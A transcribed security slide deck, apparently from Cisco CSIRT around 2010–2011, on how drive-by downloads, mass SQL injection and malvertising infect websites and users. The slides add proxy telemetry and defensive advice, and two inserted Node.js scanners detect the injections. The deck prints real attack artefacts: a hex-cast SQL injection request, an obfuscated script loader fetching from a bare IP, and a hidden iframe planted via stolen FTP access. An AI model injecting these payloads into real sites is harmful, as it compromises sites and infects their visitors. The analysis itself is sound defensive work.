A Study on the State of Web Security

It's 2011. Why are we still dealing with drive-by downloads? We combine telemetry data from two web security products with millions of users to answer some of today's top questions. Where are the malicious payloads hosted? How are legitimate sites infected by criminals? Do we really want to block the unintentionally malicious sites? Use these answers to optimize your web security efforts.


A Study on the State of Web Security

  1. A Study on the State of Web Security
     Henry Stern, Security Investigator, Cisco CSIRT
     © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public
  2. 1. Hacked While Browsing
     2. Web Exploit Architecture
     3. The Study
     4. Securing your Clients and Servers
  3. [image only]
  4. [image only]
  5. [image only]
  6. [image only]
  7. •  Let’s see what’s happening behind the scenes
  8. How does a Web Page Work?
     HTML: the web site “recipe.” The initial HTML retrieval provides the “recipe”; the browser then fetches all objects listed in it.
     Web Resources: the actual ingredients, retrieved, per the HTML, from any specified location. Includes:
     •  Images
     •  Scripts
     •  Executable objects (“plug-ins”)
     •  Other web pages
  9. •  URLs in browser: 1
     •  HTTP GETs: 162
     •  Images: 66 from 18 domains, including 5 separate 1x1 pixel invisible tracking images
     •  Scripts: 87 from 7 domains
     •  Cookies: 118 from 15 domains
     •  8 Flash objects from 4 domains
  10. •  Web page HTML is the recipe
     •  Code snippets are web site ingredients
     •  The browser will fetch each ingredient
     •  Each ingredient initiates an HTTP transaction
  11. •  “Application Vulnerabilities Exceed OS Vulnerabilities”
     •  IE and Firefox vulnerable
     •  “…hundreds of vulnerabilities in ActiveX controls installed by software vendors have been discovered.”
     Sources: SANS Top Cyber Security Risks 2007, 2009, http://www.sans.org/top-cyber-security-risks/
  12. •  Quicktime, Java, Flash, Reader, DirectX
     •  Explosion of Browser Helper Objects and third-party plug-ins
     •  Plug-ins are installed (semi-)transparently by the website. Users are unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites.
  13. [image only]
  14. [image only]
  15. •  brookeseidl.com registered at eNom, 2002
     •  63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains
     Script injected onto the web page – one extra ingredient!
  16. •  Browser fetches h.js javascript from tejary.net
     •  Tejary.net registered 2003 at GoDaddy and hosted on 68.178.160.68 in Arizona
     •  Registered by Aljuraid, Mr Nassir A in Saudi Arabia
     •  Tejary.net/h.js calls two remote iframe objects
  17. •  V3i9.cn registered on 3/25/09. DNS by mysuperdns.com
     •  Hosted on 216.245.201.208 at Limestone Networks in Dallas, TX
     •  Fetched objects include ipp.htm, real.html, real.js, 14.htm, 14.js, flash.htm, igg.htm
  18. It all starts with /c.htm loaded from tejary.net, said7.com
     Real Player Exploit
     •  /ipp.htm – Real Player exploit CVE-2008-1309. 2/40 anti-virus vendors detect; calls real.html. Includes f#!kyoukaspersky
     •  /real.htm, /real.js – Real Player exploit CVE-2007-5601
     MDAC (Microsoft Data Access Component) Exploit
     •  /14.htm, /14.js – exploits the MS06-014 vulnerability in the MDAC functions
     Flash Exploit
     •  /swfobject.js – detects the Flash version and selects content accordingly
     •  /flash.htm – Flash exploit. 2/40 anti-virus vendors detect
     •  /igg.htm – ??? Called from /flash.htm for exploit?
  19. •  After successful exploit, malware installed from v3i9.cn
     •  ce.exe = Gh0st malware: keylogging, web cam monitoring. Persistent connection to China: 58.253.68.68 vobe.3322.org
  20. “…Criminals have used the Internet to steal more than $100 million from U.S. banks so far this year and they did it without ever having to draw a gun or pass a note to a teller… …I’ve seen attacks where there’s been $10 million lost in one 24-hour period.”
     – Shawn Henry, FBI Assistant Director, Cyber Division, 8 Nov 2010, CBS “60 Minutes”
  21. •  Ce.exe analyzed on VirusTotal: 31% detection on days 1 and 2, 48% detection on day 3
     •  21% detection for SMS.exe
  22. [image only]
  23. [image only]
  24. “By enticing a user to visit a maliciously crafted web page, an attacker may trigger the issue, which may lead to arbitrary code execution.”
  25. •  Lots of legitimate web surfing.
     •  Our enterprise customers each request millions of pages per day.
     •  Miscreants tap in to legitimate traffic.
     •  Advantages: you don’t have to create new things. Piggyback on sites’ reputation, page rank.
     •  Risk proportional to reward.
  26. •  Infected thousands of websites with vulnerable ASP and Cold Fusion pages and MSSQL database.
     •  Infections persist to this day!
     •  How? Google hacking + run-on-any-schema SQL injection.
        POST /somefile.asp
        ID=123;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C004 … 0073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
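The request on slide 26 carries its SQL as a hex literal cast to NVARCHAR, which is why it slips past string-matching on keywords like UPDATE. As an added example (not code from the deck), the Node.js scanner below flags that DECLARE/CAST(0x…)/EXEC shape in web server log lines and decodes the UTF-16LE hex so an analyst can read the statement; the log lines and the hex payload are constructed samples.

```javascript
// Added example, not from the slides: flag the DECLARE/CAST(0x...)/EXEC
// mass SQL-injection pattern in web server logs and decode the hex-encoded
// statement so an analyst can read what it would have executed.
// Log lines and the hex payload below are constructed samples.

// NVARCHAR hex is UTF-16LE; this reverses CAST(0x... AS NVARCHAR(4000)).
function decodeNvarcharHex(hex) {
  return Buffer.from(hex, 'hex').toString('utf16le');
}

// Matches the request after URL-decoding: DECLARE @x ... CAST(0x<hex> AS
// NVARCHAR ... EXEC(@x). Case-insensitive, since T-SQL is.
const INJECT_RE =
  /DECLARE\s+@\w+.*?CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+NVARCHAR.*?EXEC\s*\(\s*@\w+\s*\)/i;

// Percent-decode tolerantly: a malformed escape must not crash the scanner.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// Returns { line, decodedSql } for every log line carrying the pattern.
function findHexSqlInjection(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = INJECT_RE.exec(safeDecode(line));
    if (m) hits.push({ line, decodedSql: decodeNvarcharHex(m[1]) });
  }
  return hits;
}

// Constructed sample: the hex is built from a harmless marker string so the
// example is self-contained (the slide's real payload is elided as "...").
const SAMPLE_SQL = 'DECLARE @T varchar(255) -- constructed sample';
const SAMPLE_HEX = Buffer.from(SAMPLE_SQL, 'utf16le').toString('hex').toUpperCase();
const SAMPLE_LOGS = [
  '2010-11-08 10:00:01 GET /somefile.asp?ID=123 200',
  '2010-11-08 10:00:02 POST /somefile.asp ID=123;DECLARE%20@S%20NVARCHAR(4000);' +
    'SET%20@S=CAST(0x' + SAMPLE_HEX + '%20AS%20NVARCHAR(4000));EXEC(@S); 200',
  '2010-11-08 10:00:03 GET /images/logo.gif 200',
];

for (const hit of findHexSqlInjection(SAMPLE_LOGS)) {
  console.log('suspicious request:', hit.line.split(' ')[3]);
  console.log('decoded statement:', hit.decodedSql);
}
```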
  27. •  Victims infected with info stealer by drive-by download.
     •  Steals FTP credentials from victims.
     •  Obfuscated javascript code is inserted into any file that contains a <body> tag.
     •  New victims are infected through victim’s own website.
     •  Infected sites were de-listed by Google.
        document.write(unescape('Dp%3CscOCrmKfipa0tie%20sa0rDpc%3D4P%2FvI%2F94c30%2EOC2vI474P%2E2%2E1a095vI%2FOCj0yhqueier0yhy%2Ejs%3E%3CDp%2Fsc30cri4Ppc30tDp%3E').replace(/4P|mKf|0yh|c30|vI|ie|a0|OC|Dp/g,""));
        Decodes to: <script src=//94.247.2.195/jquery.js></script>
  28. [SOCKS 5 header]
     USER victim
     PASS a 9-digit secure random password
     PASV
     TYPE I
     RETR //public_html/forum/db/index.htm
     PASV
     TYPE I
     STOR //public_html/forum/db/index.htm
     QUIT
     Injected into index.htm:
     <iframe src="http://activeware.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>
     Source: Christian Kreibich at ICSI Berkeley
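Slides 27 and 28 show the two artefacts a site-integrity monitor should catch: a document.write(unescape(…).replace(…)) wrapper that only reveals its script tag at runtime, and a 1x1 hidden iframe written into index.htm over FTP. As an added example (not code from the deck), the Node.js snippet below unwraps that wrapper statically, by applying the same percent-decode and junk-token strip to the string literal instead of executing it, and flags hidden iframes and script sources pointing at bare IP addresses; the inputs are reconstructed from the two slides.

```javascript
// Added example, not from the slides: statically unwrap the
// document.write(unescape('...').replace(/junk/g, "")) pattern from slide 27
// and flag hidden iframes like the one uploaded in slide 28, without
// executing any of the page's script. Inputs are reconstructed from the slides.

const WRITER_RE =
  /document\.write\(\s*unescape\(\s*['"]([^'"]+)['"]\s*\)\s*\.replace\(\s*\/([^/]+)\/g\s*,\s*['"]{2}\s*\)\s*\)/g;

// Same transformation the obfuscator relies on, applied to the literal:
// percent-decode, then strip every junk token from the alternation.
function unwrapWriter(encoded, junkAlternation) {
  return unescape(encoded).replace(new RegExp(junkAlternation, 'g'), '');
}

// Returns the HTML fragment hidden inside each matching document.write call.
function recoverInjectedHtml(source) {
  const out = [];
  for (const m of source.matchAll(WRITER_RE)) out.push(unwrapWriter(m[1], m[2]));
  return out;
}

// Flags <iframe> tags that are hidden or 1 pixel wide, and any <script>/<iframe>
// whose src is a bare IPv4 host; returns the offending tags.
function findInjectionIndicators(html) {
  const hits = [];
  for (const m of html.matchAll(/<(iframe|script)\b([^>]*)>/gi)) {
    const attrs = m[2];
    const hidden = /visibility\s*:\s*hidden|display\s*:\s*none|width=["']?1\b/i.test(attrs);
    const ipHost = /src=["']?(?:https?:)?\/\/\d{1,3}(?:\.\d{1,3}){3}\b/i.test(attrs);
    if ((m[1].toLowerCase() === 'iframe' && hidden) || ipHost) hits.push(m[0]);
  }
  return hits;
}

// Reconstructed from slide 27 with the slide's line breaks removed.
const SLIDE27_SNIPPET = "document.write(unescape('Dp%3CscOCrmKfipa0tie%20sa0rDpc%3D4P%2FvI%2F94c30%2EOC2vI474P%2E2%2E1a095vI%2FOCj0yhqueier0yhy%2Ejs%3E%3CDp%2Fsc30cri4Ppc30tDp%3E').replace(/4P|mKf|0yh|c30|vI|ie|a0|OC|Dp/g,\"\"));";

// The iframe STORed into index.htm in the slide 28 FTP session.
const SLIDE28_IFRAME = '<iframe src="http://activeware.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';

for (const fragment of recoverInjectedHtml(SLIDE27_SNIPPET)) {
  console.log('recovered:', fragment, findInjectionIndicators(fragment));
}
console.log('slide 28:', findInjectionIndicators(SLIDE28_IFRAME));
```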
  29. •  Whole website with aggressive SEO uploaded to compromised host.
     •  Hotlinks to images on legitimate websites.
     •  GIS queries send users to SEO site instead of image host.
     •  Links to drive-by download.
  30. [image only]
  31. •  Malicious banner ads unknowingly served by Google and Microsoft.
     •  Caused a drive-by download.
     •  ScanSafe: 10% of hits via Hotmail. Adshufffle.com
     •  Installed fake AV.
  32. [image only]
  33. [image only]
  34. [image only]
  35. •  Phone-home data from thousands of IronPort web proxies.
     •  Anonymized traffic summaries.
     •  Web reputation: Bad, Neutral and Good. Default actions: block, scan, allow. Plus content policies.
     •  Randomly sampled 1 billion clicks from a pool of 3 trillion.
     •  Used the actual action taken by the appliance.
  36. Share of clicks by web reputation and how many were blocked (pie chart):
     •  Bad: 1% of clicks, 93% blocked
     •  Neutral: 85% of clicks, 3% blocked
     •  Good: 14% of clicks, 1% blocked
  37. Share of clicks by object type (pie chart): Image 45%, HTML 17%, Javascript 13%, Other 9%, Video 5%, CSS 3%, XML 3%, Binary 3%, Flash 2%, Zip 0%
  38. Bar chart (y-axis 0.00% to 0.90%) for Javascript, Flash, PDF, Image, Binary; labelled values 0.80%, 0.17%, 0.20%, 0.08%, 0.07%
  39. Pie chart: Good 5%, Bad 21%, Neutral 74%
  40. [image only]
  41. •  Users: targeted training designed to defend against social engineering.
     •  Host-level: patch browser and applications. Audit all applications and files on desktops. “Lock down” hosts where applicable.
     •  Network-level security: reputation and content scanning for all web objects. Secure HTTPS. Usability vs. security: block objects, not pages. Active detection of infected users.
  42. •  Secure web application development (OWASP).
     •  Vulnerability assessment before deployment.
     •  Regular penetration testing.
     •  Monitor site security and integrity.
     •  Pay attention to third-party software.
     •  Consider a Web Application Firewall.
     •  Outbound scanning with AV/Safe Browsing.
     •  Two-factor authentication.
     •  IP-based access controls.
  43. •  Compliance and auditing.
     •  Security posture.
     •  Third-party integration.
     •  Secondary usage of data.
     •  Geographical affinity.
     •  Incident reporting.
  44. Thank you.
